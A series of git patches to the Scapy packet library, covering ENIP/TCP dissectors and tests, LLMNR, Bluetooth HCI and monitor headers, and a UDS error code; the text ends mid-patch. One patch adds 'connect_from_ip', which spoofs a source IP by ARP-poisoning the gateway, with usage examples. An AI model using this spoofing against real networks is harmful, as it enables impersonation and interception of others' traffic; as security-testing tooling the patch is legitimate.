"ENIPUnregisterSession" + pass + + +# Send RR Data (0x006f) + + +class ENIPSendRRData(Packet): + """Send RR Data Command Field""" + name = "ENIPSendRRData" + fields_desc = [ + LEIntEnumField("interface", 0, _interfaceList), + LEShortField("timeout", 0xff), + LEFieldLenField("itemCount", 0, count_of="items"), + PacketListField("items", None, ItemData) + # TODO: Send RR Data is usually followed by a CIP packet + ] + + +# Send Unit Data (0x006f) + + +class ENIPSendUnitData(Packet): + """Send Unit Data Command Field""" + name = "ENIPSendUnitData" + fields_desc = [ + LEIntEnumField("interface", 0, _interfaceList), + LEShortField("timeout", 0xff), + LEFieldLenField("itemCount", 0, count_of="items"), + PacketListField("items", None, ItemData) + ] + + +# Main Ethernet/IP packet structure with header + + class ENIPTCP(Packet): """Ethernet/IP packet over TCP""" name = "ENIPTCP" @@ -175,38 +285,6 @@ class ENIPTCP(Packet): LEIntEnumField("status", None, _statusList), LELongField("senderContext", 0), LEIntField("options", 0), - MultipleTypeField( - [ - # List Services Reply - (PacketField("commandSpecificData", ENIPListServicesReply, - ENIPListServicesReply), - lambda pkt: pkt.commandId == 0x4), - # List Identity Reply - (PacketField("commandSpecificData", ENIPListIdentityReply, - ENIPListIdentityReply), - lambda pkt: pkt.commandId == 0x63), - # List Interfaces Reply - (PacketField("commandSpecificData", ENIPListInterfacesReply, - ENIPListInterfacesReply), - lambda pkt: pkt.commandId == 0x64), - # Register Session - (PacketField("commandSpecificData", ENIPRegisterSession, - ENIPRegisterSession), - lambda pkt: pkt.commandId == 0x65), - # Send RR Data - (PacketField("commandSpecificData", ENIPSendRRData, - ENIPSendRRData), - lambda pkt: pkt.commandId == 0x6f), - # Send Unit Data - (PacketField("commandSpecificData", ENIPSendUnitData, - ENIPSendUnitData), - lambda pkt: pkt.commandId == 0x70), - ], - PacketField( - "commandSpecificData", - None, - CommandSpecificData) # By default - ), ] def post_build(self, pkt, pay): @@ -217,3 +295,12 @@ def post_build(self, pkt, pay): bind_layers(TCP, ENIPTCP, dport=44818) bind_layers(TCP, ENIPTCP, sport=44818) + +bind_layers(ENIPTCP, ENIPUnknownCommand, commandId=0x0001) +bind_layers(ENIPTCP, ENIPListServices, commandId=0x0004) +bind_layers(ENIPTCP, ENIPListIdentity, commandId=0x0063) +bind_layers(ENIPTCP, ENIPListInterfaces, commandId=0x0064) +bind_layers(ENIPTCP, ENIPRegisterSession, commandId=0x0065) +bind_layers(ENIPTCP, ENIPUnregisterSession, commandId=0x0066) +bind_layers(ENIPTCP, ENIPSendRRData, commandId=0x006f) +bind_layers(ENIPTCP, ENIPSendUnitData, commandId=0x0070) diff --git a/test/contrib/enipTCP.uts b/test/contrib/enipTCP.uts index 3c32c2ffdda..d2d820c669e 100644 --- a/test/contrib/enipTCP.uts +++ b/test/contrib/enipTCP.uts @@ -6,6 +6,7 @@ from scapy.contrib.enipTCP import * #from scapy.all import * + + Test ENIP/TCP Encapsulation Header = Encapsulation Header Default Values pkt=ENIPTCP() @@ -17,40 +18,44 @@ assert pkt.senderContext == 0 assert pkt.options == 0 -+ ENIP List Services ++ ENIP List Services 0x0004 = ENIP List Services Reply Command ID pkt=ENIPTCP() pkt.commandId=0x4 assert pkt.commandId == 0x4 -= ENIP List Services Reply Default Values -pkt=pkt/ENIPListServicesReply() -assert pkt[ENIPListServicesReply].itemCount == 0 += ENIP List Services Default Values +pkt=ENIPListServices() +assert pkt.itemCount == 0 -= ENIP List Services Reply Items Default Values -pkt=pkt/ENIPListServicesReplyItems() -assert pkt[ENIPListServicesReplyItems].itemTypeCode == 0 -assert pkt[ENIPListServicesReplyItems].itemLength == 0 -assert pkt[ENIPListServicesReplyItems].version == 1 -assert pkt[ENIPListServicesReplyItems].flag == 0 -assert pkt[ENIPListServicesReplyItems].serviceName == None += ENIP List Services Custom Values +pkt.items.append(ENIPListServicesItem(serviceName=b'test')) +assert pkt.items[0].itemTypeCode == 0 +assert pkt.items[0].itemLength == 0 +assert pkt.items[0].protocolVersion == 0 +assert pkt.items[0].flag == 0 +assert pkt.items[0].serviceName == b'test' -+ ENIP List Identity ++ ENIP List Identity 0x0063 = ENIP List Identity Reply Command ID pkt=ENIPTCP() pkt.commandId=0x63 assert pkt.commandId == 0x63 +assert raw(pkt) == b"c\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ +b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -= ENIP List Identity Reply Default Values -pkt=pkt/ENIPListIdentityReply() -assert pkt[ENIPListIdentityReply].itemCount == 0 += ENIP List Identity Default Values +pkt=ENIPListIdentity() +assert pkt.itemCount == 0 -= ENIP List Identity Reply Items Default Values -pkt=pkt/ENIPListIdentityReplyItems() -assert pkt[ENIPListIdentityReplyItems].itemTypeCode == 0 -assert pkt[ENIPListIdentityReplyItems].itemLength == 0 -assert pkt[ENIPListIdentityReplyItems].itemData == b'' += ENIP List Identity Custom Values +pkt=ENIPListIdentityItem(sinAddress="192.168.1.1", + productNameLength=4, productName=b"test") +assert pkt.protocolVersion == 0 +assert pkt.sinAddress == "192.168.1.1" +assert pkt.productNameLength == 4 +assert pkt.productName == b'test' + ENIP List Interfaces @@ -60,14 +65,15 @@ pkt.commandId=0x64 assert pkt.commandId == 0x64 = ENIP List Interfaces Reply Default Values -pkt=pkt/ENIPListInterfacesReply() -assert pkt[ENIPListInterfacesReply].itemCount == 0 +pkt=ENIPListInterfaces() +assert pkt.itemCount == 0 = ENIP List Interfaces Reply Items Default Values -pkt=pkt/ENIPListInterfacesReplyItems() -assert pkt[ENIPListInterfacesReplyItems].itemTypeCode == 0 -assert pkt[ENIPListInterfacesReplyItems].itemLength == 0 -assert pkt[ENIPListInterfacesReplyItems].itemData == b'' +pkt=ENIPListInterfacesItem(itemTypeCode=0x0c) +assert pkt.itemTypeCode == 0x0c +assert pkt.itemLength == 0 +assert pkt.itemData == b'' + + ENIP Register Session = ENIP Register Session Command ID @@ -76,14 +82,13 @@ pkt.commandId=0x65 assert pkt.commandId == 0x65 = ENIP Register Session Default Values -pkt=pkt/ENIPRegisterSession() -assert pkt[ENIPRegisterSession].protocolVersion == 1 -assert pkt[ENIPRegisterSession].options == 0 +pkt=ENIPRegisterSession() +assert pkt.protocolVersion == 1 +assert pkt.options == 0 = ENIP Register Session Request registerSessionReqPkt = b'\x65\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00' - pkt = ENIPTCP(registerSessionReqPkt) assert pkt.commandId == 0x65 assert pkt.length == 4 @@ -106,6 +111,7 @@ assert pkt.senderContext == 0 assert pkt.options == 0 assert pkt[ENIPRegisterSession].protocolVersion == 1 assert pkt[ENIPRegisterSession].options == 0 +raw(pkt) + ENIP Send RR Data @@ -115,10 +121,10 @@ pkt.commandId=0x6f assert pkt.commandId == 0x6f = ENIP Send RR Data Default Values -pkt=pkt/ENIPSendRRData() -assert pkt[ENIPSendRRData].interfaceHandle == 0 -assert pkt[ENIPSendRRData].timeout == 0 -assert pkt[ENIPSendRRData].encapsulatedPacket == None +pkt=ENIPSendRRData() +assert pkt.interface == 0 +assert pkt.timeout == 255 +assert pkt.itemCount == 0 = ENIP Send RR Data Request sendRRDataReqPkt = b'\x6f\x00\x3e\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x2e\x00' @@ -129,10 +135,9 @@ assert pkt.session == 0xa14e9a7b assert pkt.status == 0 assert pkt.senderContext == 0 assert pkt.options == 0 -assert pkt[ENIPSendRRData].interfaceHandle == 0 -assert pkt[ENIPSendRRData].timeout == 0 -assert pkt[EncapsulatedPacket].itemCount == 2 - +assert pkt.interface == 0 +assert pkt.timeout == 0 +assert pkt.itemCount == 2 = ENIP Send RR Data Reply sendRRDataRepPkt = b'\x6f\x00\x2e\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x1e\x00' @@ -144,12 +149,13 @@ assert pkt.session == 0xa14e9a7b assert pkt.status == 0 assert pkt.senderContext == 0 assert pkt.options == 0 -assert pkt[ENIPSendRRData].interfaceHandle == 0 -assert pkt[ENIPSendRRData].timeout == 1024 -assert pkt[EncapsulatedPacket].item[0].typeId == 0 -assert pkt[EncapsulatedPacket].item[0].length == 0 -assert pkt[EncapsulatedPacket].item[1].typeId == 0x00b2 -assert pkt[EncapsulatedPacket].item[1].length == 30 +assert pkt.interface == 0 +assert pkt.timeout == 1024 +assert pkt.items[0].typeId == 0 +assert pkt.items[0].length == 0 +assert pkt.items[1].typeId == 0x00b2 +assert pkt.items[1].length == 30 + + ENIP Send Unit Data = ENIP Send Unit Data Command ID @@ -158,16 +164,14 @@ pkt.commandId=0x70 assert pkt.commandId == 0x70 = ENIP Send Unit Data Default Values -pkt=pkt/ENIPSendUnitData() -assert pkt[ENIPSendUnitData].interfaceHandle == 0 -assert pkt[ENIPSendUnitData].timeout == 0 -assert pkt[ENIPSendUnitData].encapsulatedPacket == None - +pkt=ENIPSendUnitData() +assert pkt.interface == 0 +assert pkt.timeout == 255 +assert pkt.itemCount == 0 = ENIP Send Unit Data sendUnitDataPkt = b'\x70\x00\x2d\x00\x7b\x9a\x4e\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\xa1\x00\x04\x00\xcc\x60\x9a\x7b\xb1\x00\x19\x00\x01\x00' - pkt = ENIPTCP(sendUnitDataPkt) assert pkt.commandId == 0x70 assert pkt.length == 45 @@ -175,19 +179,13 @@ assert pkt.session == 0xa14e9a7b assert pkt.status == 0 assert pkt.senderContext == 0 assert pkt.options == 0 -assert pkt[ENIPSendUnitData].interfaceHandle == 0 -assert pkt[ENIPSendUnitData].timeout == 0 -assert pkt[EncapsulatedPacket].itemCount == 2 - -assert pkt[EncapsulatedPacket].item[0].typeId == 0x00a1 -assert pkt[EncapsulatedPacket].item[0].length == 4 -assert pkt[EncapsulatedPacket].item[0].data == b'\x7b\x9a\x60\xcc' -assert pkt[EncapsulatedPacket].item[1].typeId == 0x00b1 -assert pkt[EncapsulatedPacket].item[1].length == 25 -assert pkt[EncapsulatedPacket].item[1].data == b'\x00\x01' - - - - - - +assert pkt.interface == 0 +assert pkt.timeout == 0 +assert pkt.itemCount == 2 + +assert pkt.items[0].typeId == 0x00a1 +assert pkt.items[0].length == 4 +assert pkt.items[0].data == b'\x7b\x9a\x60\xcc' +assert pkt.items[1].typeId == 0x00b1 +assert pkt.items[1].length == 25 +assert pkt.items[1].data == b'\x00\x01' From a8d2bb7d1ad68b3442533fecb0510b3c02316950 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 7 Aug 2023 19:59:28 +0300 Subject: [PATCH 1073/1632] [LLMNR] recognize the "T"entative bit (#4089) According to https://datatracker.ietf.org/doc/html/rfc4795#section-2.1.1 the TC bit is followed by the T bit: ``` 1 1 1 1 1 1 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ | ID | +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ |QR| Opcode | C|TC| T| Z| Z| Z| Z| RCODE | +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ ``` where the 'T'entative bit is set in a response if the responder is authoritative for the name, but has not yet verified the uniqueness of the name. This patch splits the 2-bit "TC" field into two 1-bit fields corresponding to the "TC" and "T" bits. The test is added to make sure that tentative responses can be dissected. It was also cross-checked with Wireshark: ``` Link-local Multicast Name Resolution (response) Transaction ID: 0x87df Flags: 0x8100 Standard query response, No error 1... .... .... .... = Response: Message is a response .000 0... .... .... = Opcode: Standard query (0) .... .0.. .... .... = Conflict: The name is considered unique .... ..0. .... .... = Truncated: Message is not truncated .... ...1 .... .... = Tentative: Tentative .... .... .... 0000 = Reply code: No error (0) ``` --- scapy/layers/llmnr.py | 3 ++- test/scapy/layers/llmnr.uts | 5 +++++ 2 files changed, 7 insertions(+), 1 deletion(-) diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index c393d1f3109..89815e5f200 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -37,7 +37,8 @@ class LLMNRQuery(DNSCompressedPacket): BitField("qr", 0, 1), BitEnumField("opcode", 0, 4, {0: "QUERY"}), BitField("c", 0, 1), - BitField("tc", 0, 2), + BitField("tc", 0, 1), + BitField("t", 0, 1), BitField("z", 0, 4) ] + DNS.fields_desc[-9:] overload_fields = {UDP: {"sport": 5355, "dport": 5355}} diff --git a/test/scapy/layers/llmnr.uts b/test/scapy/layers/llmnr.uts index 2da7a907859..6eff7fc98fe 100644 --- a/test/scapy/layers/llmnr.uts +++ b/test/scapy/layers/llmnr.uts @@ -10,12 +10,17 @@ assert pkt.sport == 5355 assert pkt.dport == 5355 assert pkt[LLMNRQuery].opcode == 0 += Dissection with the "T"entative bit set and the "TrunCation" bit unset +r = LLMNRResponse(b'\x87\xdf\x81\x00\x00\x01\x00\x01\x00\x00\x00\x00\x01C\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\xc0\xa8-\x15') +assert r.tc == 0 and r.t == 1 + = Packet build / dissection pkt = UDP(raw(UDP()/LLMNRResponse())) assert LLMNRResponse in pkt assert pkt.qr == 1 assert pkt.c == 0 assert pkt.tc == 0 +assert pkt.t == 0 assert pkt.z == 0 assert pkt.rcode == 0 assert pkt.qdcount == 0 From 2fe5cee7b2fdca940b1774ee26a4948e88417232 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Antonio=20V=C3=A1zquez=20Blanco?= Date: Fri, 21 Jul 2023 22:00:27 +0200 Subject: [PATCH 1074/1632] bluetooth: Add a BT monitor header for pcap parsing --- scapy/data.py | 1 + scapy/layers/bluetooth.py | 20 ++++++++++++++++---- test/scapy/layers/bluetooth.uts | 8 ++++++++ 3 files changed, 25 insertions(+), 4 deletions(-) diff --git a/scapy/data.py b/scapy/data.py index 7e7f4ab8a7c..9e83fee05fb 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -128,6 +128,7 @@ DLT_NETLINK = 253 DLT_USB_DARWIN = 266 DLT_BLUETOOTH_LE_LL = 251 +DLT_BLUETOOTH_LINUX_MONITOR = 254 DLT_BLUETOOTH_LE_LL_WITH_PHDR = 256 DLT_VSOCK = 271 DLT_ETHERNET_MPACKET = 274 diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 8411d3b38ec..31438ce103e 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -17,7 +17,11 @@ from ctypes import sizeof from scapy.config import conf -from scapy.data import DLT_BLUETOOTH_HCI_H4, DLT_BLUETOOTH_HCI_H4_WITH_PHDR +from scapy.data import ( + DLT_BLUETOOTH_HCI_H4, + DLT_BLUETOOTH_HCI_H4_WITH_PHDR, + DLT_BLUETOOTH_LINUX_MONITOR +) from scapy.packet import bind_layers, Packet from scapy.fields import ( BitField, @@ -34,6 +38,7 @@ NBytesField, PacketListField, PadField, + ShortField, SignedByteField, StrField, StrFixedLenField, @@ -188,9 +193,6 @@ class HCI_PHDR_Hdr(Packet): class BT_Mon_Hdr(Packet): - ''' - Bluetooth Linux Monitor Transport Header - ''' name = 'Bluetooth Linux Monitor Transport Header' fields_desc = [ LEShortField('opcode', None), @@ -199,6 +201,15 @@ class BT_Mon_Hdr(Packet): ] +# https://www.tcpdump.org/linktypes/LINKTYPE_BLUETOOTH_LINUX_MONITOR.html +class BT_Mon_Pcap_Hdr(BT_Mon_Hdr): + name = 'Bluetooth Linux Monitor Transport Pcap Header' + fields_desc = [ + ShortField('adapter_id', None), + ShortField('opcode', None) + ] + + class HCI_Hdr(Packet): name = "HCI header" fields_desc = [ByteEnumField("type", 2, _bluetooth_packet_types)] @@ -1277,6 +1288,7 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): conf.l2types.register(DLT_BLUETOOTH_HCI_H4, HCI_Hdr) conf.l2types.register(DLT_BLUETOOTH_HCI_H4_WITH_PHDR, HCI_PHDR_Hdr) +conf.l2types.register(DLT_BLUETOOTH_LINUX_MONITOR, BT_Mon_Pcap_Hdr) bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, opcode=0x0405) bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, opcode=0x0406) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 43f55ac66cc..c103fb0081b 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -431,3 +431,11 @@ assert r == b'\rscapy\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = SM_Hdr(r) assert SM_DHKey_Check in p and p.dhkey_check[:5] == b"scapy" + + += Bluetooth Monitor Pcap Header + +p = BT_Mon_Pcap_Hdr(hex_bytes("00000008")) +assert BT_Mon_Pcap_Hdr in p +assert p[BT_Mon_Pcap_Hdr].adapter_id == 0 +assert p[BT_Mon_Pcap_Hdr].opcode == 8 From 62f398cc2b730dc01287fc2c7d9e469c65007761 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 22 Aug 2023 04:44:54 +0200 Subject: [PATCH 1075/1632] Add connect_from_ip command (#4098) connect_from_ip creates a tcp socket that spoofs another IP. --- scapy/automaton.py | 27 +++++++-------- scapy/layers/inet.py | 81 +++++++++++++++++++++++++++++++++++++++++--- scapy/layers/l2.py | 7 +++- scapy/supersocket.py | 1 + 4 files changed, 96 insertions(+), 20 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 15179e306bb..a12fb6953c5 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -16,6 +16,7 @@ import logging import os import random +import socket import sys import threading import time @@ -77,7 +78,7 @@ def select_objects(inputs, remain): [b] :param inputs: objects to process - :param remain: timeout. If 0, return []. + :param remain: timeout. If 0, poll. """ if not WINDOWS: return select.select(inputs, [], [], remain)[0] @@ -901,35 +902,33 @@ def __init__(self, wr # type: Union[int, ObjectPipe[bytes], None] ): # type: (...) -> None - if rd is not None and not isinstance(rd, (int, ObjectPipe)): - rd = rd.fileno() - if wr is not None and not isinstance(wr, (int, ObjectPipe)): - wr = wr.fileno() self.rd = rd self.wr = wr + if isinstance(self.rd, socket.socket): + self.__selectable_force_select__ = True def fileno(self): # type: () -> int - if isinstance(self.rd, ObjectPipe): - return self.rd.fileno() - elif isinstance(self.rd, int): + if isinstance(self.rd, int): return self.rd + elif self.rd: + return self.rd.fileno() return 0 def read(self, n=65535): # type: (int) -> Optional[bytes] - if isinstance(self.rd, ObjectPipe): - return self.rd.recv(n) - elif isinstance(self.rd, int): + if isinstance(self.rd, int): return os.read(self.rd, n) + elif self.rd: + return self.rd.recv(n) return None def write(self, msg): # type: (bytes) -> int - if isinstance(self.wr, ObjectPipe): - return self.wr.send(msg) - elif isinstance(self.wr, int): + if isinstance(self.wr, int): return os.write(self.wr, msg) + elif self.wr: + return self.wr.send(msg) return 0 def recv(self, n=65535): diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 95c07073800..ad12ce82515 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -21,8 +21,16 @@ from scapy.base_classes import Gen, Net from scapy.data import ETH_P_IP, ETH_P_ALL, DLT_RAW, DLT_RAW_ALT, DLT_IPV4, \ IP_PROTOS, TCP_SERVICES, UDP_SERVICES -from scapy.layers.l2 import Ether, Dot3, getmacbyip, CookedLinux, GRE, SNAP, \ - Loopback +from scapy.layers.l2 import ( + CookedLinux, + Dot3, + Ether, + GRE, + Loopback, + SNAP, + arpcachepoison, + getmacbyip, +) from scapy.compat import raw, chb, orb, bytes_encode, Optional from scapy.config import conf from scapy.fields import ( @@ -1888,15 +1896,18 @@ class TCP_client(Automaton): :param ip: the ip to connect to :param port: + :param src: (optional) use another source IP """ - def parse_args(self, ip, port, *args, **kargs): + def parse_args(self, ip, port, srcip=None, **kargs): from scapy.sessions import TCPSession self.dst = str(Net(ip)) self.dport = port self.sport = random.randrange(0, 2**16) - self.l4 = IP(dst=ip) / TCP(sport=self.sport, dport=self.dport, flags=0, - seq=random.randrange(0, 2**32)) + self.l4 = IP(dst=ip, src=srcip) / TCP( + sport=self.sport, dport=self.dport, + flags=0, seq=random.randrange(0, 2**32) + ) self.src = self.l4.src self.sack = self.l4[TCP].ack self.rel_seq = None @@ -2160,6 +2171,66 @@ def fragleak2(target, timeout=0.4, onlyasc=0, count=None): pass +@conf.commands.register +class connect_from_ip: + """ + Open a TCP socket to a host:port while spoofing another IP. + + :param host: the host to connect to + :param port: the port to connect to + :param srcip: the IP to spoof. the cache of the gateway will + be poisonned with this IP. + :param poison: (optional, default True) ARP poison the gateway (or next hop), + so that it answers us. + :param timeout: (optional) the socket timeout. + + Example - Connect to 192.168.0.1:80 spoofing 192.168.0.2:: + + from scapy.layers.http import HTTP, HTTPRequest + client = connect_from_ip("192.168.0.1", 80, "192.168.0.2") + sock = SSLStreamSocket(client.sock, HTTP) + resp = sock.sr1(HTTP() / HTTPRequest(Path="/")) + + Example - Connect to 192.168.0.1:443 with TLS wrapping spoofing 192.168.0.2:: + + import ssl + from scapy.layers.http import HTTP, HTTPRequest + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + client = connect_from_ip("192.168.0.1", 443, "192.168.0.2") + sock = context.wrap_socket(client.sock) + sock = SSLStreamSocket(client.sock, HTTP) + resp = sock.sr1(HTTP() / HTTPRequest(Path="/")) + """ + + def __init__(self, host, port, srcip, poison=True, timeout=1): + host = str(Net(host)) + # poison the next hop + if poison: + gateway = conf.route.route(host)[2] + if gateway == "0.0.0.0": + # on lan + gateway = host + arpcachepoison(gateway, srcip, count=1, interval=0, verbose=0) + # create a socket pair + self._sock, self.sock = socket.socketpair() + self.sock.settimeout(timeout) + self.client = TCP_client( + host, port, + srcip=srcip, + external_fd={"tcp": self._sock}, + ) + # start the TCP_client + self.client.runbg() + + def close(self): + self.client.stop() + self.client.destroy() + self.sock.close() + self._sock.close() + + class ICMPEcho_am(AnsweringMachine): """Responds to ICMP Echo-Requests (ping)""" function_name = "icmpechod" diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index ea3e05d808c..5ac5db7ce91 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -773,7 +773,9 @@ def arpcachepoison( target, # type: Union[str, List[str]] addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]] broadcast=False, # type: bool + count=None, # type: Optional[int] interval=15, # type: int + **kwargs, # type: Any ): # type: (...) -> None """Poison targets' ARP cache @@ -815,9 +817,12 @@ def arpcachepoison( hwsrc=y, hwdst="00:00:00:00:00:00") for x, y in couple_list ] + if count is not None: + sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs) + return try: while True: - sendp(p, iface_hint=str_target) + sendp(p, iface_hint=str_target, **kwargs) time.sleep(interval) except KeyboardInterrupt: pass diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 32526d78476..eff4589cf55 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -373,6 +373,7 @@ def send(self, x): class SimpleSocket(SuperSocket): desc = "wrapper around a classic socket" + __selectable_force_select__ = True def __init__(self, sock): # type: (socket.socket) -> None From 3707afdaa851dc661904314787a0101d12a50a5c Mon Sep 17 00:00:00 2001 From: superuserx Date: Thu, 24 Aug 2023 09:51:25 +0200 Subject: [PATCH 1076/1632] Update uds.py (#4102) --- scapy/contrib/automotive/uds.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 0da2c18bef2..74952f4d884 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1334,6 +1334,7 @@ class UDS_NR(Packet): 0x26: 'failurePreventsExecutionOfRequestedAction', 0x31: 'requestOutOfRange', 0x33: 'securityAccessDenied', + 0x34: 'authenticationRequired', 0x35: 'invalidKey', 0x36: 'exceedNumberOfAttempts', 0x37: 'requiredTimeDelayNotExpired', From 8eab848c4b3820c3792d547b637ded43e3ad6155 Mon Sep 17 00:00:00 2001 From: Hui Peng Date: Fri, 25 Aug 2023 00:40:19 -0700 Subject: [PATCH 1077/1632] Improve Bluetooth HCI Command packet definition (#4088) * Improve Bluetooth HCI Command packet definition - Divide opcode into ogf and ocf following Core Spec - Redefine existing HCI commands with new format * Fix some issues in existing hci command packets 1. Fix some outdated command definitions 2. Fix the names of commands, use the formal name from core spec 3. Fix the some of the tests --- scapy/layers/bluetooth.py | 398 +++++++++++++++++++++----------- test/scapy/layers/bluetooth.uts | 184 +++++++++++---- 2 files changed, 398 insertions(+), 184 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 31438ce103e..cca1d5a9086 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -25,6 +25,7 @@ from scapy.packet import bind_layers, Packet from scapy.fields import ( BitField, + XBitField, ByteEnumField, ByteField, FieldLenField, @@ -45,6 +46,7 @@ StrLenField, UUIDField, XByteField, + XLE3BytesField, XLELongField, XStrLenField, XLEShortField, @@ -898,77 +900,54 @@ def extract_padding(self, s): class HCI_Command_Hdr(Packet): name = "HCI Command header" - fields_desc = [XLEShortField("opcode", 0), + fields_desc = [XBitField("ogf", 0, 6, tot_size=-2), + XBitField("ocf", 0, 10, end_tot_size=-2), LenField("len", None, fmt="B"), ] def answers(self, other): return False + @property + def opcode(self): + return (self.ogf << 10) + self.ocf + def post_build(self, p, pay): p += pay if self.len is None: p = p[:2] + struct.pack("B", len(pay)) + p[3:] return p - -class HCI_Cmd_Reset(Packet): - name = "Reset" - - -class HCI_Cmd_Set_Event_Filter(Packet): - name = "Set Event Filter" - fields_desc = [ByteEnumField("type", 0, {0: "clear"}), ] - - -class HCI_Cmd_Connect_Accept_Timeout(Packet): - name = "Connection Attempt Timeout" - fields_desc = [LEShortField("timeout", 32000)] # 32000 slots is 20000 msec - - -class HCI_Cmd_LE_Host_Supported(Packet): - name = "LE Host Supported" - fields_desc = [ByteField("supported", 1), - ByteField("simultaneous", 1), ] - - -class HCI_Cmd_Set_Event_Mask(Packet): - name = "Set Event Mask" - fields_desc = [StrFixedLenField("mask", b"\xff\xff\xfb\xff\x07\xf8\xbf\x3d", 8)] # noqa: E501 - - -class HCI_Cmd_Read_BD_Addr(Packet): - name = "Read BD Addr" +# BLUETOOTH CORE SPECIFICATION Version 5.4 | Vol 4, Part E +# 7 HCI COMMANDS AND EVENTS +# 7.1 LINK CONTROL COMMANDS, the OGF is defined as 0x01 -class HCI_Cmd_Write_Local_Name(Packet): - name = "Write Local Name" - fields_desc = [StrField("name", "")] +class HCI_Cmd_Inquiry(Packet): + name = "HCI_Inquiry" + fields_desc = [XLE3BytesField("lap", 0x9E8B33), + ByteField("inquiry_length", 0), + ByteField("num_responses", 0)] -class HCI_Cmd_Write_Extended_Inquiry_Response(Packet): - name = "Write Extended Inquiry Response" - fields_desc = [ByteField("fec_required", 0), - PacketListField("eir_data", [], EIR_Hdr, - length_from=lambda pkt:pkt.len)] +class HCI_Cmd_Inquiry_Cancel(Packet): + name = "HCI_Inquiry_Cancel" -class HCI_Cmd_LE_Set_Scan_Parameters(Packet): - name = "LE Set Scan Parameters" - fields_desc = [ByteEnumField("type", 1, {1: "active"}), - XLEShortField("interval", 16), - XLEShortField("window", 16), - ByteEnumField("atype", 0, {0: "public"}), - ByteEnumField("policy", 0, {0: "all", 1: "whitelist"})] +class HCI_Cmd_Periodic_Inquiry_Mode(Packet): + name = "HCI_Periodic_Inquiry_Mode" + fields_desc = [LEShortField("max_period_length", 0x0003), + LEShortField("min_period_length", 0x0002), + XLE3BytesField("lap", 0x9E8B33), + ByteField("inquiry_length", 0), + ByteField("num_responses", 0)] -class HCI_Cmd_LE_Set_Scan_Enable(Packet): - name = "LE Set Scan Enable" - fields_desc = [ByteField("enable", 1), - ByteField("filter_dups", 1), ] +class HCI_Cmd_Exit_Peiodic_Inquiry_Mode(Packet): + name = "HCI_Exit_Periodic_Inquiry_Mode" class HCI_Cmd_Create_Connection(Packet): - name = "Create Connection" + name = "HCI_Create_Connection" fields_desc = [LEMACField("bd_addr", None), LEShortField("packet_type", 0xcc18), ByteField("page_scan_repetition_mode", 0x02), @@ -978,100 +957,136 @@ class HCI_Cmd_Create_Connection(Packet): class HCI_Cmd_Disconnect(Packet): - name = "Disconnect" + name = "HCI_Disconnect" fields_desc = [XLEShortField("handle", 0), ByteField("reason", 0x13), ] class HCI_Cmd_Link_Key_Request_Reply(Packet): - name = "Link Key Request Reply" + name = "HCI_Link_Key_Request_Reply" fields_desc = [LEMACField("bd_addr", None), NBytesField("link_key", None, 16), ] class HCI_Cmd_Authentication_Requested(Packet): - name = "Authentication Requested" + name = "HCI_Authentication_Requested" fields_desc = [LEShortField("handle", 0)] class HCI_Cmd_Set_Connection_Encryption(Packet): - name = "Set Connection Encryption" + name = "HCI_Set_Connection_Encryption" fields_desc = [LEShortField("handle", 0), ByteField("encryption_enable", 0)] class HCI_Cmd_Remote_Name_Request(Packet): - name = "Remote Name Request" + name = "HCI_Remote_Name_Request" fields_desc = [LEMACField("bd_addr", None), 